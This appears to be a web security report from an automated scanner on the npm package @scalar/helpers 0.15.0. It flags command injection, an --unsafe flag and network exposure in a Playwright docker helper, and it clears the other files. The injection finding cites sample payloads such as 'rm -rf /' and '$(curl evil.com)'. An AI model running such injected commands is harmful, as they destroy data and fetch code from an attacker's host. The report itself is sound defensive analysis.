Togoder security

npm package security report

@scalar/helpers npm package: is it safe?

Risky patterns found that deserve a look.

Needs review Version 0.15.0 Files reviewed 93 Size 159.2 KB Scanned

Summary

Togoder Security scanned the npm package @scalar/helpers@0.15.0 on Oct 6, 2026. An AI review of 93 source files produced 2 medium, 1 low severity findings. The overall verdict is medium: the findings flag risky but common patterns (dynamic code, unsafe defaults, broad file or network access) rather than confirmed malware.

0
critical
0
high
2
medium
1
low

Findings 3

medium

Command execution via server config

NPS-D02CD7D1A73D

The module builds a command string that is executed by Playwright's webServer feature: docker run ... playwright run-server --port ${port} --host 0.0.0.0 --unsafe. The port value is interpolated directly into the shell command without sanitization. If a caller passes a malicious port (e.g. 5001; rm -rf / or $(curl evil.com)) via opts, it would be injected into the command string executed by the test runner. This is a command-injection risk, though it requires the caller to supply untrusted options.

dist/playwright/docker.js:25
medium

Use of --unsafe flag

NPS-AA3875B28CA9

The command starts the Playwright server with --unsafe, which disables the server's safety checks and allows risky launch options (such as arbitrary args) forwarded from clients to be honored. This weakens isolation and could allow a client to influence browser/process launch behavior in ways Playwright intentionally blocks by default. Combined with --network=host and binding to 0.0.0.0, any process that can reach the port can potentially exercise this.

dist/playwright/docker.js:25
low

Network exposure (0.0.0.0 / host networking)

NPS-1F9D098644F8

The container is started with --network=host and the server binds to 0.0.0.0, exposing the Playwright server on all host interfaces rather than localhost only. This increases the attack surface on developer/CI machines.

dist/playwright/docker.js:25

Files reviewed

FileVerdictWhat the reviewer saw
dist/playwright/docker.js medium The file is a legitimate Playwright docker-server config helper, but it interpolates unsanitized port into a shell command, uses --unsafe, and exposes the server on all interfaces via host networking, which are security-relevant weaknesses rather than overt malware.
dist/array/add-to-map-array.js safe Cleared by Jev triage; no further analysis needed
dist/array/is-defined.js safe Cleared by Jev triage; no further analysis needed
dist/array/sort-by-order.js safe Cleared by Jev triage; no further analysis needed
dist/dom/freeze-element.js safe Cleared by Jev triage; no further analysis needed
dist/dom/get-selector.js safe Cleared by Jev triage; no further analysis needed
dist/dom/is-plain-left-click.js safe Cleared by Jev triage; no further analysis needed
dist/dom/scroll-to-id.js safe Cleared by Jev triage; no further analysis needed
dist/errors/normalize-error.js safe Cleared by Jev triage; no further analysis needed
dist/file/json2xml.js safe No malicious patterns detected; the code is a straightforward JSON-to-XML converter with proper XML escaping and no network, filesystem, process, or dynamic code execution behavior.
dist/formatters/format-bytes.js safe Cleared by Jev triage; no further analysis needed
dist/formatters/format-milliseconds.js safe Cleared by Jev triage; no further analysis needed
dist/general/compare-versions.js safe Cleared by Jev triage; no further analysis needed
dist/general/create-limiter.js safe Cleared by Jev triage; no further analysis needed
dist/general/debounce.js safe Cleared by Jev triage; no further analysis needed
dist/general/extract-config-secrets.js safe No malicious patterns detected
dist/general/has-modifier.js safe Cleared by Jev triage; no further analysis needed
dist/general/is-electron.js safe Cleared by Jev triage; no further analysis needed
dist/general/is-mac-os.js safe The code only checks the browser user agent to detect macOS and contains no malicious patterns, network activity, or dynamic execution.
dist/http/can-method-have-body.js safe The file only contains HTTP method body-validation logic with no malicious patterns, network calls, credential access, or dynamic code execution.
dist/http/content-types.js safe Cleared by Jev triage; no further analysis needed
dist/http/get-first-media-type.js safe Cleared by Jev triage; no further analysis needed
dist/http/http-headers.js safe Cleared by Jev triage; no further analysis needed
dist/http/http-info.js safe Cleared by Jev triage; no further analysis needed
dist/http/http-methods.js safe Cleared by Jev triage; no further analysis needed
Show 68 more files
FileVerdictWhat the reviewer saw
dist/http/http-status-codes.js safe Cleared by Jev triage; no further analysis needed
dist/http/http-token.js safe Cleared by Jev triage; no further analysis needed
dist/http/is-forbidden-http-method.js safe Cleared by Jev triage; no further analysis needed
dist/http/is-http-method.js safe Cleared by Jev triage; no further analysis needed
dist/http/is-json-media-type.js safe Cleared by Jev triage; no further analysis needed
dist/http/is-streaming-content-type.js safe Cleared by Jev triage; no further analysis needed
dist/http/is-xml-media-type.js safe Cleared by Jev triage; no further analysis needed
dist/http/mime-type.js safe Cleared by Jev triage; no further analysis needed
dist/http/normalize-headers.js safe Cleared by Jev triage; no further analysis needed
dist/http/normalize-http-method.js safe Cleared by Jev triage; no further analysis needed
dist/http/scalar-headers.js safe Cleared by Jev triage; no further analysis needed
dist/http/serialize-cookie.js safe Cleared by Jev triage; no further analysis needed
dist/json/escape-json-for-inline-script.js safe Cleared by Jev triage; no further analysis needed
dist/json/escape-json-pointer.js safe Cleared by Jev triage; no further analysis needed
dist/json/parse-json-pointer-segments.js safe Cleared by Jev triage; no further analysis needed
dist/json/pretty-print-json.js safe Cleared by Jev triage; no further analysis needed
dist/json/serialize-property-key.js safe Cleared by Jev triage; no further analysis needed
dist/json/unescape-json-pointer.js safe Cleared by Jev triage; no further analysis needed
dist/markdown/get-markdown-headings.js safe Cleared by Jev triage; no further analysis needed
dist/markdown/release-notes.js safe Cleared by Jev triage; no further analysis needed
dist/node/path.js safe Cleared by Jev triage; no further analysis needed
dist/object/get-value-at-path.js safe Cleared by Jev triage; no further analysis needed
dist/object/is-object-equal.js safe Cleared by Jev triage; no further analysis needed
dist/object/is-object.js safe Cleared by Jev triage; no further analysis needed
dist/object/local-storage.js safe Cleared by Jev triage; no further analysis needed
dist/object/merge-objects.js safe Cleared by Jev triage; no further analysis needed
dist/object/object-entries.js safe Cleared by Jev triage; no further analysis needed
dist/object/object-keys.js safe Cleared by Jev triage; no further analysis needed
dist/object/object-replace.js safe Cleared by Jev triage; no further analysis needed
dist/object/omit-undefined-values.js safe Cleared by Jev triage; no further analysis needed
dist/object/prevent-pollution.js safe Cleared by Jev triage; no further analysis needed
dist/object/set-value-at-path.js safe No malicious patterns detected; the code is a straightforward nested object setter with prototype pollution prevention.
dist/object/to-json-compatible.js safe Cleared by Jev triage; no further analysis needed
dist/openapi/is-schema-path.js safe Cleared by Jev triage; no further analysis needed
dist/queue/queue.js safe Cleared by Jev triage; no further analysis needed
dist/regex/find-variables.js safe Cleared by Jev triage; no further analysis needed
dist/regex/regex-helpers.js safe Cleared by Jev triage; no further analysis needed
dist/regex/replace-variables.js safe No malicious patterns detected; the code only performs string variable replacement using regular expressions without any network, filesystem, process, or dynamic code execution.
dist/storybook/globals.js safe No malicious patterns detected; the file contains only benign Storybook theme/color-mode configuration helpers with no network, filesystem, process, or dynamic-execution activity.
dist/storybook/themes.js safe No malicious patterns detected
dist/string/camel-to-title.js safe Cleared by Jev triage; no further analysis needed
dist/string/capitalize.js safe Cleared by Jev triage; no further analysis needed
dist/string/create-hash.js safe Cleared by Jev triage; no further analysis needed
dist/string/generate-hash.js safe Cleared by Jev triage; no further analysis needed
dist/string/get-utf8-byte-length.js safe Cleared by Jev triage; no further analysis needed
dist/string/iterate-title.js safe Cleared by Jev triage; no further analysis needed
dist/string/slugger.js safe Cleared by Jev triage; no further analysis needed
dist/string/slugify.js safe The slugify function only performs pure string normalization and regex replacement with no network, filesystem, process, or dynamic code execution patterns.
dist/string/truncate.js safe Cleared by Jev triage; no further analysis needed
dist/testing/console-spies.js safe No malicious patterns detected; the file only uses vitest spies to wrap console.warn and console.error for testing purposes.
dist/testing/measure.js safe Cleared by Jev triage; no further analysis needed
dist/testing/measure.test-d.js safe No malicious patterns detected; the file contains only Vitest type tests for measure functions with no network, filesystem, or execution code.
dist/testing/sleep.js safe Cleared by Jev triage; no further analysis needed
dist/theme/color-mode.js safe Cleared by Jev triage; no further analysis needed
dist/theme/load-css-variables.js safe Cleared by Jev triage; no further analysis needed
dist/types/assertions.js safe Cleared by Jev triage; no further analysis needed
dist/types/result.js safe Cleared by Jev triage; no further analysis needed
dist/types/safe-run.js safe No malicious patterns detected
dist/url/ensure-protocol.js safe Cleared by Jev triage; no further analysis needed
dist/url/extract-server-from-path.js safe No malicious patterns detected; the module performs pure URL parsing and returns a tuple without network, filesystem, process, or dynamic execution behavior.
dist/url/is-local-url.js safe No malicious patterns detected; the code is a simple, pure utility function for detecting local/reserved hostnames with no network, filesystem, process, or dynamic code execution activity.
dist/url/is-relative-path.js safe Cleared by Jev triage; no further analysis needed
dist/url/is-safe-url.js safe Cleared by Jev triage; no further analysis needed
dist/url/is-valid-url.js safe Cleared by Jev triage; no further analysis needed
dist/url/make-url-absolute.js safe Cleared by Jev triage; no further analysis needed
dist/url/merge-urls.js safe No malicious patterns detected; the code is a benign URL merging utility with no network, filesystem, environment, or dynamic execution concerns.
dist/url/oas-document-fixtures.js safe Cleared by Jev triage; no further analysis needed
dist/url/redirect-to-proxy.js safe No malicious patterns detected; the code implements a legitimate proxy URL rewriting utility with no data exfiltration, credential harvesting, obfuscation, or process spawning.

Scanned versions of @scalar/helpers

VersionVerdictFilesScanned
0.15.0 Needs review 93 Oct 6, 2026

Frequently asked questions

Is @scalar/helpers safe to use?

No confirmed malware was found in @scalar/helpers@0.15.0, but the review flagged 2 medium, 1 low severity findings for risky patterns worth checking before you rely on it.

Does @scalar/helpers contain malware?

No malware was identified in @scalar/helpers@0.15.0 when Togoder Security scanned it on Oct 6, 2026. A new version can still introduce malicious code, so scan the exact versions in your lockfile.

How was @scalar/helpers checked?

Togoder Security downloaded the published npm package and had an AI model read its 93 source files, looking for install scripts, credential access, network exfiltration, obfuscation, backdoors and crypto-wallet theft. The results are cached by file hash and shown here.

How do I scan @scalar/helpers together with the rest of my dependencies?

Upload your lockfile at https://security.togoder.click/scan or call the API documented at https://security.togoder.click/api-docs. Files that have already been scanned, like the ones in @scalar/helpers@0.15.0, cost nothing.

Related security reports